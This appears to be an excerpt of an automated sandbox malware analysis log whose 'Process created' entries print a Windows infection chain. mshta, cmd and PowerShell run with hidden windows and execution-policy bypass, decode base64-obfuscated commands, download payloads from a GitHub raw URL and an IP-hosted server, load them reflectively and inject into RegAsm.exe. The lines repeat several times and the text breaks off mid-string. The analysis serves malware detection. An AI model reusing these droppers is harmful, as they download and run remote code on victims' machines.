'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jfayasagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicbhreqtdflqzsagicagicagicagicagicagicagicagicagicagicagic1nrw1izxjerwzjtmluaw9oicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvste1vti5ktewilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbiemn3dexodyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbmd2pwlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigzsv2necyx1aw50icagicagicagicagicagicagicagicagicagicagicagrhhgv2juvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicb0q2pitxpfeffcktsnicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicaiag1mwghpwgdnv1kiicagicagicagicagicagicagicagicagicagicagicaglw5htwvzugfjzsagicagicagicagicagicagicagicagicagicagicagie9ytxlnwuxfwxf2icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrqmmk6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4ymjaumjavotcvcgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vzc50suyilcikru5wokfquerbvefccgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vlnzcuyismcwwkttzvgfydc1zbgvfucgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicagicikzu52okfquerbvefccgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vlnzcuyi='+[char]34+'))')))"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jfayasagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicbhreqtdflqzsagicagicagicagicagicagicagicagicagicagicagic1nrw1izxjerwzjtmluaw9oicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvste1vti5ktewilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbiemn3dexodyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbmd2pwlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigzsv2necyx1aw50icagicagicagicagicagicagicagicagicagicagicagrhhgv2juvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicb0q2pitxpfeffcktsnicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicaiag1mwghpwgdnv1kiicagicagicagicagicagicagicagicagicagicagicaglw5htwvzugfjzsagicagicagicagicagicagicagicagicagicagicagie9ytxlnwuxfwxf2icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrqmmk6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4ymjaumjavotcvcgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vzc50suyilcikru5wokfquerbvefccgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vlnzcuyismcwwkttzvgfydc1zbgvfucgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicagicikzu52okfquerbvefccgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vlnzcuyi='+[char]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgneycrjzinkyd9jysndscrj3jsjysniccrjz0gezb9ahr0chm6ly9yyxcuz2knkyd0jysnahunkydidxnlcmnvjysnbnrlbnquy28nkydtjysnl05vrgv0jysnzscrj2n0t24vticrj29ezxrlyycrj3rpbi8nkydyzscrj2ynkydzl2hlyscrj2rzl21hascrj24vrgv0yscrj2hob3rolvynkycudhh0ezb9oycrjyb7jysnmn1iyxnljysnnjrdb250zw50id0gke5ldy0nkydpymply3qnkycgu3lzjysndgvtlk4nkydljysndccrjy5xjysnzscrj2jdbgllbnqplkrvjysnd24nkydsb2enkydkjysnu3ryaw5nkhsyjysnfxunkydybcknkyc7ihsnkycyjysnfscrj2jpbmfyeunvbnrlbnqgpsbbjysnuycrj3knkydzdgvtjysnlknvjysnbicrj3ynkydlcnrdojpgcm8nkydtqmfzzty0u3qnkydyaw5nkhsnkycyjysnfwjhc2unkyc2nenvjysnbnqnkydlbnqpoyb7jysnmn1hc3nljysnbwjsesa9iftszscrj2zszwn0jysnaw9ujysnlkfzcycrj2vtymwnkyd5jysnxto6jysntg9hzch7mn1iaw5hcicrj3ldbycrj24nkyd0zw50ktsgwycrj2rujysnbglilklplkhvbwvdojpwqukoezf9jysndhh0licrj1ynkydwqkdgjysnuicrjy83jysnoscrjy8wmi4nkycwmicrjziumy4yjysnotevjysnlycrjzonkydwdhroezf9lccrjyb7jysnmx0nkydkzxnhdccrj2l2ywrvezenkyd9lcb7mx0nkydkjysnzxnhdgknkyd2jysnywrvezf9lcankyd7mscrj31kzxnhjysndgl2ywrveycrjzf9lccrjyankyd7mx1szwdbc217mx0sjysnihsxfxsxfsx7mx17mx0pjykgic1mw0niyxjdmzksw0niyxjdmzqsw0niyxjdmzypihwgjiggjevovjpdt21zuevdwzqsmjysmjvdluppsu4njyk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/nodet'+'e'+'cton/n'+'odetec'+'ton/'+'re'+'f'+'s/hea'+'ds/mai'+'n/deta'+'hnoth-v'+'.txt{0};'+' {'+'2}base'+'64content = (new-'+'object'+' sys'+'tem.n'+'e'+'t'+'.w'+'e'+'bclient).do'+'wn'+'loa'+'d'+'string({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binarycontent = ['+'s'+'y'+'stem'+'.co'+'n'+'v'+'ert]::fro'+'mbase64st'+'ring({'+'2'+'}base'+'64co'+'nt'+'ent); {'+'2}asse'+'mbly = [re'+'flect'+'ion'+'.ass'+'embl'+'y'+']::'+'load({2}binar'+'yco'+'n'+'tent); ['+'dn'+'lib.io.home]::vai({1}'+'txt.'+'v'+'vbgf'+'r'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}regasm{1},'+' {1}{1},{1}{1})') -f[char]39,[char]34,[char]36) | &( $env:comspec[4,26,25]-join'')"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jfayasagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicbhreqtdflqzsagicagicagicagicagicagicagicagicagicagicagic1nrw1izxjerwzjtmluaw9oicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvste1vti5ktewilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbiemn3dexodyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbmd2pwlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigzsv2necyx1aw50icagicagicagicagicagicagicagicagicagicagicagrhhgv2juvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicb0q2pitxpfeffcktsnicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicaiag1mwghpwgdnv1kiicagicagicagicagicagicagicagicagicagicagicaglw5htwvzugfjzsagicagicagicagicagicagicagicagicagicagicagie9ytxlnwuxfwxf2icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrqmmk6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4ymjaumjavotcvcgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vzc50suyilcikru5wokfquerbvefccgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vlnzcuyismcwwkttzvgfydc1zbgvfucgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicagicikzu52okfquerbvefccgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vlnzcuyi='+[char]34+'))')))"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jfayasagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicbhreqtdflqzsagicagicagicagicagicagicagicagicagicagicagic1nrw1izxjerwzjtmluaw9oicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvste1vti5ktewilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbiemn3dexodyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbmd2pwlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigzsv2necyx1aw50icagicagicagicagicagicagicagicagicagicagicagrhhgv2juvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicb0q2pitxpfeffcktsnicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicaiag1mwghpwgdnv1kiicagicagicagicagicagicagicagicagicagicagicaglw5htwvzugfjzsagicagicagicagicagicagicagicagicagicagicagie9ytxlnwuxfwxf2icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrqmmk6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4ymjaumjavotcvcgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vzc50suyilcikru5wokfquerbvefccgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vlnzcuyismcwwkttzvgfydc1zbgvfucgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicagicikzu52okfquerbvefccgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vlnzcuyi='+[char]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgneycrjzinkyd9jysndscrj3jsjysniccrjz0gezb9ahr0chm6ly9yyxcuz2knkyd0jysnahunkydidxnlcmnvjysnbnrlbnquy28nkydtjysnl05vrgv0jysnzscrj2n0t24vticrj29ezxrlyycrj3rpbi8nkydyzscrj2ynkydzl2hlyscrj2rzl21hascrj24vrgv0yscrj2hob3rolvynkycudhh0ezb9oycrjyb7jysnmn1iyxnljysnnjrdb250zw50id0gke5ldy0nkydpymply3qnkycgu3lzjysndgvtlk4nkydljysndccrjy5xjysnzscrj2jdbgllbnqplkrvjysnd24nkydsb2enkydkjysnu3ryaw5nkhsyjysnfxunkydybcknkyc7ihsnkycyjysnfscrj2jpbmfyeunvbnrlbnqgpsbbjysnuycrj3knkydzdgvtjysnlknvjysnbicrj3ynkydlcnrdojpgcm8nkydtqmfzzty0u3qnkydyaw5nkhsnkycyjysnfwjhc2unkyc2nenvjysnbnqnkydlbnqpoyb7jysnmn1hc3nljysnbwjsesa9iftszscrj2zszwn0jysnaw9ujysnlkfzcycrj2vtymwnkyd5jysnxto6jysntg9hzch7mn1iaw5hcicrj3ldbycrj24nkyd0zw50ktsgwycrj2rujysnbglilklplkhvbwvdojpwqukoezf9jysndhh0licrj1ynkydwqkdgjysnuicrjy83jysnoscrjy8wmi4nkycwmicrjziumy4yjysnotevjysnlycrjzonkydwdhroezf9lccrjyb7jysnmx0nkydkzxnhdccrj2l2ywrvezenkyd9lcb7mx0nkydkjysnzxnhdgknkyd2jysnywrvezf9lcankyd7mscrj31kzxnhjysndgl2ywrveycrjzf9lccrjyankyd7mx1szwdbc217mx0sjysnihsxfxsxfsx7mx17mx0pjykgic1mw0niyxjdmzksw0niyxjdmzqsw0niyxjdmzypihwgjiggjevovjpdt21zuevdwzqsmjysmjvdluppsu4njyk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/nodet'+'e'+'cton/n'+'odetec'+'ton/'+'re'+'f'+'s/hea'+'ds/mai'+'n/deta'+'hnoth-v'+'.txt{0};'+' {'+'2}base'+'64content = (new-'+'object'+' sys'+'tem.n'+'e'+'t'+'.w'+'e'+'bclient).do'+'wn'+'loa'+'d'+'string({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binarycontent = ['+'s'+'y'+'stem'+'.co'+'n'+'v'+'ert]::fro'+'mbase64st'+'ring({'+'2'+'}base'+'64co'+'nt'+'ent); {'+'2}asse'+'mbly = [re'+'flect'+'ion'+'.ass'+'embl'+'y'+']::'+'load({2}binar'+'yco'+'n'+'tent); ['+'dn'+'lib.io.home]::vai({1}'+'txt.'+'v'+'vbgf'+'r'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}regasm{1},'+' {1}{1},{1}{1})') -f[char]39,[char]34,[char]36) | &( $env:comspec[4,26,25]-join'')"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jfayasagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicbhreqtdflqzsagicagicagicagicagicagicagicagicagicagicagic1nrw1izxjerwzjtmluaw9oicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvste1vti5ktewilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbiemn3dexodyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbmd2pwlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigzsv2necyx1aw50icagicagicagicagicagicagicagicagicagicagicagrhhgv2juvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicb0q2pitxpfeffcktsnicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicaiag1mwghpwgdnv1kiicagicagicagicagicagicagicagicagicagicagicaglw5htwvzugfjzsagicagicagicagicagicagicagicagicagicagicagie9ytxlnwuxfwxf2icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrqmmk6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4ymjaumjavotcvcgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vzc50suyilcikru5wokfquerbvefccgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vlnzcuyismcwwkttzvgfydc1zbgvfucgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicagicikzu52okfquerbvefccgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vlnzcuyi='+[char]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jfayasagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicbhreqtdflqzsagicagicagicagicagicagicagicagicagicagicagic1nrw1izxjerwzjtmluaw9oicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvste1vti5ktewilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbiemn3dexodyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbmd2pwlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigzsv2necyx1aw50icagicagicagicagicagicagicagicagicagicagicagrhhgv2juvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicb0q2pitxpfeffcktsnicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicaiag1mwghpwgdnv1kiicagicagicagicagicagicagicagicagicagicagicaglw5htwvzugfjzsagicagicagicagicagicagicagicagicagicagicagie9ytxlnwuxfwxf2icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrqmmk6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4ymjaumjavotcvcgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vzc50suyilcikru5wokfquerbvefccgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vlnzcuyismcwwkttzvgfydc1zbgvfucgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicagicikzu52okfquerbvefccgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vlnzcuyi='+[char]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgneycrjzinkyd9jysndscrj3jsjysniccrjz0gezb9ahr0chm6ly9yyxcuz2knkyd0jysnahunkydidxnlcmnvjysnbnrlbnquy28nkydtjysnl05vrgv0jysnzscrj2n0t24vticrj29ezxrlyycrj3rpbi8nkydyzscrj2ynkydzl2hlyscrj2rzl21hascrj24vrgv0yscrj2hob3rolvynkycudhh0ezb9oycrjyb7jysnmn1iyxnljysnnjrdb250zw50id0gke5ldy0nkydpymply3qnkycgu3lzjysndgvtlk4nkydljysndccrjy5xjysnzscrj2jdbgllbnqplkrvjysnd24nkydsb2enkydkjysnu3ryaw5nkhsyjysnfxunkydybcknkyc7ihsnkycyjysnfscrj2jpbmfyeunvbnrlbnqgpsbbjysnuycrj3knkydzdgvtjysnlknvjysnbicrj3ynkydlcnrdojpgcm8nkydtqmfzzty0u3qnkydyaw5nkhsnkycyjysnfwjhc2unkyc2nenvjysnbnqnkydlbnqpoyb7jysnmn1hc3nljysnbwjsesa9iftszscrj2zszwn0jysnaw9ujysnlkfzcycrj2vtymwnkyd5jysnxto6jysntg9hzch7mn1iaw5hcicrj3ldbycrj24nkyd0zw50ktsgwycrj2rujysnbglilklplkhvbwvdojpwqukoezf9jysndhh0licrj1ynkydwqkdgjysnuicrjy83jysnoscrjy8wmi4nkycwmicrjziumy4yjysnotevjysnlycrjzonkydwdhroezf9lccrjyb7jysnmx0nkydkzxnhdccrj2l2ywrvezenkyd9lcb7mx0nkydkjysnzxnhdgknkyd2jysnywrvezf9lcankyd7mscrj31kzxnhjysndgl2ywrveycrjzf9lccrjyankyd7mx1szwdbc217mx0sjysnihsxfxsxfsx7mx17mx0pjykgic1mw0niyxjdmzksw0niyxjdmzqsw0niyxjdmzypihwgjiggjevovjpdt21zuevdwzqsmjysmjvdluppsu4njyk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/nodet'+'e'+'cton/n'+'odetec'+'ton/'+'re'+'f'+'s/hea'+'ds/mai'+'n/deta'+'hnoth-v'+'.txt{0};'+' {'+'2}base'+'64content = (new-'+'object'+' sys'+'tem.n'+'e'+'t'+'.w'+'e'+'bclient).do'+'wn'+'loa'+'d'+'string({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binarycontent = ['+'s'+'y'+'stem'+'.co'+'n'+'v'+'ert]::fro'+'mbase64st'+'ring({'+'2'+'}base'+'64co'+'nt'+'ent); {'+'2}asse'+'mbly = [re'+'flect'+'ion'+'.ass'+'embl'+'y'+']::'+'load({2}binar'+'yco'+'n'+'tent); ['+'dn'+'lib.io.home]::vai({1}'+'txt.'+'v'+'vbgf'+'r'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}regasm{1},'+' {1}{1},{1}{1})') -f[char]39,[char]34,[char]36) | &( $env:comspec[4,26,25]-join'')"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jfayasagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicbhreqtdflqzsagicagicagicagicagicagicagicagicagicagicagic1nrw1izxjerwzjtmluaw9oicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvste1vti5ktewilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbiemn3dexodyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbmd2pwlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigzsv2necyx1aw50icagicagicagicagicagicagicagicagicagicagicagrhhgv2juvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicb0q2pitxpfeffcktsnicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicaiag1mwghpwgdnv1kiicagicagicagicagicagicagicagicagicagicagicaglw5htwvzugfjzsagicagicagicagicagicagicagicagicagicagicagie9ytxlnwuxfwxf2icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrqmmk6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4ymjaumjavotcvcgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vzc50suyilcikru5wokfquerbvefccgljdhvyzxdpdghncmvhdgrhexnldmvyexroaw5nz29vlnzcuyismcwwkttzvgfydc1zbgvfucgzk